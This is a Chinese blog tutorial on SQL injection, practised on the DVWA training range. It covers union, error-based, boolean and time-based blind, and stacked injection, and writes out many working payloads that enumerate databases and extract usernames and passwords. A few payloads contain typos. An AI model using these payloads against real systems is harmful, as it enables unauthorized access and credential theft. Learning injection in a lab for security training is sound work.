【网络安全的神秘世界】SQL注入漏洞（上）

🌝博客主页：泥菩萨

💖专栏：Linux探索之旅 | 网络安全的神秘世界 | 专接本 | 每天学会一个渗透测试工具

本章知识使用的靶场：DVWA

一、漏洞简介

SQL：结构化查询语言，是一种特殊的编程语言，用于数据库中的标准数据查询语言

SQL注入：简而言之就是，攻击者通过系统正常的输入数据的功能，输入恶意数据，而系统又未做任何校验或校验不严格，直接信任了用户输入，使得恶意输入改变原本的SQL逻辑或者执行了额外的SQL语句，造成SQL注入攻击。

SQL注入漏洞产生需要满足的条件：

1、参数是用户可控的：前端传给后端的参数内容是用户可控的（在前端有输入点）

2、参数的值传给数据库：传入的参数拼接到SQL语句，且带入数据库做查询（尽量不做别的操作，会影响业务）

二、漏洞危害

可以获取敏感信息、修改信息、脱裤、上传webshell执行命令

【脱裤】：把整个数据库下载下来

【上传webshell】：上传脚本文件

三、SQL注入分类

在学习SQL注入之前，我们先了解一个概念”隐式转换“：

在Mysql数据库中，如果某个参数是int类型，在该参数赋值时，传递一个字符串，就会自动去识别字符串的第一个字符
如果第一个字符是数字，则转换成int类型；
如果第一个字符不是数字，则转换失败，不会继续向后识别

当id=1时查不到，因为id的类型是字符串，没有隐式转换

3.1 数字型int

当输入的参数类型（type）为整型时，若存在注入漏洞，就叫数字型注入。测试步骤如下：

#如果前端页面没有输入点，我们也可以通过URL或Bp抓包进行漏洞测试
1.加单引号，URL:www.text.com/text.php?id=1'
对应的sq1:select * from table where id=1'这时sq]语句出错，程序无法正常从数据库中查询出数据，就会抛出异常;此时可以判断大概率存在注入，因为只有服务器将这个单引号一起当作SQL语句执行时才会报错，但是并不绝对，也有可能是程序本身的问题引起报错。

2.加and 1=1,URL:www.text.com/text.php?id=l and 1=1
对应的sq1:select *from tpble where id=1 and 1=1 存在注入，语句执行正常能查询出来数据；否则返回报错

3.加and 1=2,URL:www.text.com/text.php?id=l and 1=2
对应的sq1:select* from table where id=1 and 1=2 为了进一步验证存在注入，把and 1=1改成and 1=2,语句可以正常执行，但是无法查询出结果，证明存在注入

在执行第3步时，按照正常逻辑前端页面是不应该返回结果的

很疑惑，去后端构建代码查看一下发现（实际渗透中接触不到后端）：

查询数字型1 and 1=2时，逻辑正常没有返回结果

查询字符型’1 and 1=2’时，做了隐式转换有返回结果

那我们只能去这个DVWA靶场看源代码，原来是这个靶场在用户输入内容的左右两端加了单引号（做了额外处理）

如果满足以上三点，且程序本身没有对用户的输入做任何额外处理，则可以判断该URL存在数字型注入

----------------------在实际过程中，如果网站做了额外处理该怎么查看？

我们压根看不到额外处理，所有我们只能不停的构造SQL注入语句，通过回显来推断做了什么处理

3.2 字符型varchar

当输入的参数类型（type）为字符型时，若存在注入漏洞，就叫字符型型注入

字符型和数字型最大的一个区别在于，数字型不需要单引号来闭合，而字符串一般需要通过单引号来闭合的。

根据3.1的步骤，DVWA靶场做了额外处理，所以我们可以暂时当作字符型注入：

为什么是暂时当作？

因为是网站做了处理，不影响数据库里的实际类型，所以本身是数值型注入

1 and 1=1

从逻辑上看，‘1 and 1=1’作为字符串时，是查不出结果的（数据库中不会有id的值为1 and 1=1），那我们就无法验证这个漏洞，所以，在实际测试中，我们要让构造好的语句从字符型的单引号中出来，从而进行逻辑判断，才能验证自己所思考的逻辑

因此，在构造payload时通过闭合单引号可以成功执行语句:

//截断注释方法
尝试输入:1' and 1=1 #

在数据中的语句就是：

select * from user where id ='1' and 1=1 #'

3.3 联合查询注入union

通过union或union all操作符连接多条SELECT语句进行查询

• union：会自动去除结果集中的重复行
• union all：会将所有查询结果合并在一起，包括重复的行（在实际渗透中使用，保证信息不遗漏）

联合查询使用条件：union all左右两边的查询列数保持一致，页面上有显示位

关于显示位我们要考虑两点：1.有没有 2.够不够

1️⃣有没有：看能不能返回查询条件的结果

通过order by帮我们判断前端页面上给我们显示几列

1' order by 1#

查3的时候报错了，查1和2的时候都没报错，证明有2列显示位

还有一种方法，使用联合查询，1,2表示无意义位，也是为了判断有没有显示位

1' union all select 1,2

2️⃣够不够：页面的显示位不足，会导致返回的结果不全

✨显示位只有1位：调换查询顺序

1' union all select user(),database()#

1' union all select database(),user()#

✨前端页面篇幅有限，只能显示一行：让union all左边查询不出来内容

-1' union all select 1,2#

✨前端页面篇幅有限，无法展示多行查询结果：使用group_concat()把同一列的多行合并到同一行

1' union all select 1,group_concat(user) from users#

在讲解如何利用Union注入进一步获取数据库名、表名、字段名以及字段中的数据之前，先介绍一个重要的知识点：MySQL 5.0以上版本，存在一个自带的数据库名为：information_schema

information_schema包含所有的库信息，所以拿下它就能拿下业务数据库DVWA，为我们渗透测试提供了很大的便利

information_schema数据库中有三个表非常重要：

schemata: 所有数据库的名字
tables: 所有数据库的所有表
columns: 所有数据库的所有表的所有字段

三个列非常重要：

table_schema：数据库名
table_name：表名
column_name：字段名

现在利用information_schema这个库进行查询

渗透层次结构流程：库名——>表名——>字段名——>数据

🚀从information_schema数据库中查找库名

1' union all select schema_name,1 from information_schema.schemata#

🚀从information_schema数据库中的table里查询当前数据库的表名

1' union all select table_name,1 from information_schema.tables where table_schema=database()#

🚀查找dvwa库的users表下有哪些字段

1' union all select column_name,1 from information_schema.columns where table_sechema='dvwa' and table_name='users'

🚀得到用户名和密码

1' union all select user,password from users#

3.4 报错注入

主要是利用数据库报错来进行判断是否存在注入点，如果不符合数据库语法规则就会报错并返回错误信息

目的：通过报错查询到我们想要的信息

常用的报错特殊字符：' \ ; %00 ) ( # ''

在MySQL高版本（>5.1版本）中添加了对XML文档进行查询和修改的函数，这两个函数常用于报错注入：

extractvalue()
updatexml()

原因：当这两个函数在执行时，如果出现XML文档路径错误就会产生报错

extractvalue()函数

此函数从目标XML中返回包含所查询值的字符串

extractvalue(xml_document, xpath_string)

• xml_document：是一个字符串格式的XML文档对象名称
• xpath_string：是一个XPath格式的字符串，存放路径信息

基本上第一个参数随便写，第二个参数会出现报错，所以在第二个参数位置上构造代码利用报错返回我们想要的信息

这种情况下就是我们想要的函数语法报错（原因：路径下不会存在~）

前端代码：1' extractvalue(1,'~') #

但有时候前端通往后端的过程会校验‘，我们可以通过16进制绕过

select hex('~') //~转换为16进制：0x7e

怎么在报错的情况下查找到我们想要的信息：利用concat()字符串拼接函数

注入思路：库名——>表名——>列名——>字段名

# 爆库名
1’ and extractvalue(1,concat(0x7e,database()))#

# 爆表数
1' and extractvalue(1,concat(0x7e,(select count(table_name) from information_schema.tables where table_schema='dvwa')));#

# 爆表名 
<!-- 爆破长度有限，group_concat()方法显示的不完整，要使用limit -->
1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='dvwa')));#

1' and extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='dvwa' limit 0,1)));#

# 爆字段数
1' and extractvalue(1,concat(0x7e,(select count(column_name) from information_schema.columns where table_schema='dvwa' and table_name='user')));#

# 爆字段名
1' and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='dvwa' and table_name='user' limit 0,1)));#

# 爆数据长度
1' and extractvalue(1,concat(0x7e,(select length(password) from users where user_id=1)));#

# 爆数据
<!-- 因为只让查1列，通过concat()把2列合并成1列，但是发现数据不全借助substr() -->
1' and extractvalue(1,concat(0x7e,(select concat(user,password) from users where user_id=1)));#
1' and extractvalue(1,concat(0x7e,(select substr(password,32,1) from users where user_id=1)));#

limit m,n：表示从第m+1条开始，取n条

updatexml()函数

updatexml(xml_document, XPath_string, new_value)

注入过程和extractvalue()函数一样，只不过多了一个参数

第三个参数随便写点啥都行，比如：1

3.5 盲注

只会根据注入信息返回True或False，没有之前的查询信息或者报错信息

3.5.1 布尔注入

1、判断是否存在注入，注入的类型

2、猜测当前数据库名称

猜测当前数据库库名的长度

1' and length(database()) > 3;#

猜测当前数据库的名称：取当前字符串的第一个字符转换为ASCII码与100进行比较

1' and ascii(substr(database(),1,1)) > 100;#

3、猜测数据库下的表名

猜测表的个数

1' and (select(select count(table_name) from information_schema.tables where table_schema = 'dvwa')) > 2;#

取第一个表，猜测表名的长度

1' and  length((select table_name from information_schema.tables where table_schema='dvwa' limit 0,1)) > 5;#

猜测表名

1' and  (select ascii(substr(table_name,1,1)) from information_schema.tables where table_schema='dvwa' limit 0,1) >100；#

4、猜测表中字段名

猜测字段的个数

1' and (select count(column_name) from information_schema.columns where table_schema=database() and table_name='users') > 10;#

再用上述手工注入方法就太麻烦了，我们直接猜测数据库中可能存在的字段名称（如果猜测不出来还是继续手工注入吧😂）

用户名：username/user_name/uname/u_name/user/name/…

密码：password/pass_word/pwd/pass/…

# 已知数据库为dvwa，表名为users,猜字段名为phone
1' and (select count(*) from information_schema.columns where table_schema='dwwa' and table_name='users' and column_name ='user')=1;#

5、获取表中的字段值

1）用户名的字段值

# 爆长度
1' and length((select user from users limit 0,1))>5;#

# 逐个爆破字符
1' and (select ascii(substr(user,1,1) from users limit 0,1)>100;#

2）密码的字段值

# 爆长度
1' and length(select password from users limit 0,1)>33;#

# 逐个爆破字符

6、验证字段值的有效性

将拿到的用户名和密码填写到前端登陆界面的输入框中，尝试登录是否成功

3.5.2 时间盲注

界面返回值只有一种True，我们可以通过if和sleep函数，根据页面返回的时间差来判断注入的语句是否正确

猜测当前连接数据库的名称

1' and if(length(database())=4,sleep(3),1)#;

盲注需要掌握的几种函数

• length()：返回字符串的长度
• substr()：截取字符串
• ascii()：返回字符的ascii码
• sleep()：将程序挂起一段时间

3.6 堆叠查询

多条SQL语句一起执行

使用条件：MySQL数据库的搜索引擎用到了mysqli_muli_query()

使用方法：直接在输入框输入多条SQL语句用;分隔

---

至此，对sql注入分类总结一下：

• 根据查询字段：数字型、字符型
• 根据查询方式：union注入、堆叠注入
• 根据回显：报错、盲注